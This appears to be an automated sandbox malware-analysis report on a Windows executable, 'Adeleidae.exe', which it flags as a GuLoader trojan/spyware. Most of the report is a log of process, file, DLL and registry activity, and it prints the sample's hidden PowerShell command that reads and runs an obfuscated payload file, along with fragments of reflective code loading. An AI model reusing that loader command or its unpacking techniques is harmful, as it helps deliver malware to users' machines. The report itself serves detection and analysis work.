Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6A07	6_2_27EF6A07
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6A18	6_2_27EF6A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFC9E8	6_2_27EFC9E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFE9C8	6_2_27EFE9C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFE9D8	6_2_27EFE9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFC9D8	6_2_27EFC9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF11A0	6_2_27EF11A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF1190	6_2_27EF1190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFA928	6_2_27EFA928
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFA938	6_2_27EFA938
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF08E0	6_2_27EF08E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF08F0	6_2_27EF08F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFC0C8	6_2_27EFC0C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFE0A7	6_2_27EFE0A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF38B8	6_2_27EF38B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFE0B8	6_2_27EFE0B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EFC0B7	6_2_27EFC0B7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF0040	6_2_27EF0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6022	6_2_27EF6022
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF6030	6_2_27EF6030
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF3008	6_2_27EF3008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF3007	6_2_27EF3007
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF0011	6_2_27EF0011

Source: Adeleidae.exe

Static PE information: invalid certificate

Source: Adeleidae.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/19@6/6

Source: C:\Users\user\Desktop\Adeleidae.exe

0_2_004032A0

Source: C:\Users\user\Desktop\Adeleidae.exe

Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045B4

Source: C:\Users\user\Desktop\Adeleidae.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\Adeleidae.exe

File created: C:\Users\user\AppData\Local\peritonealizing

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03

Source: C:\Users\user\Desktop\Adeleidae.exe

File created: C:\Users\user\AppData\Local\Temp\nsqC038.tmp

Jump to behavior

Source: Adeleidae.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Adeleidae.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Adeleidae.exe	ReversingLabs: Detection: 13%
Source: Adeleidae.exe	Virustotal: Detection: 22%

Source: C:\Users\user\Desktop\Adeleidae.exe

File read: C:\Users\user\Desktop\Adeleidae.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Adeleidae.exe "C:\Users\user\Desktop\Adeleidae.exe"
Source: C:\Users\user\Desktop\Adeleidae.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Adeleidae.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Damascenere.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\ProgramData\Polyhistorisk\fagbladsjournalistens.ugi

Source: C:\Users\user\Desktop\Adeleidae.exe

File written: C:\Windows\Resources\Nebengeschfter.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Adeleidae.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tem.Core.pdbt source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \System.Core.pdbfu source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2435373853.0000000009251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pennefejdes $Ungdomsoprrenes $Formernes), (Diffusionslinsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Unaccessibleness = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Baccalaureat)), $Dampsskibsselskabets).DefineDynamicModule($Normaltseende1, $false).DefineType($Nutriture33, $Yanggona, [System.Multic

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Adeleidae.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Users\user\Desktop\Adeleidae.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CDCA78 push eax; mov dword ptr [esp], edx	1_2_04CDCA8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CDD610 push esp; iretd	1_2_04CDD611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CDD0B0 pushad ; retf	1_2_04CDD0B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0781E5AC push eax; retf	1_2_0781E5AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_090F03C0 push 8BD68B50h; retf	1_2_090F03C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_090F4548 push 8BD38B50h; iretd	1_2_090F454E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A8891E pushad ; iretd	6_2_02A8891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A88C2F pushfd ; iretd	6_2_02A88C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02A88DDF push esp; iretd	6_2_02A88DE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
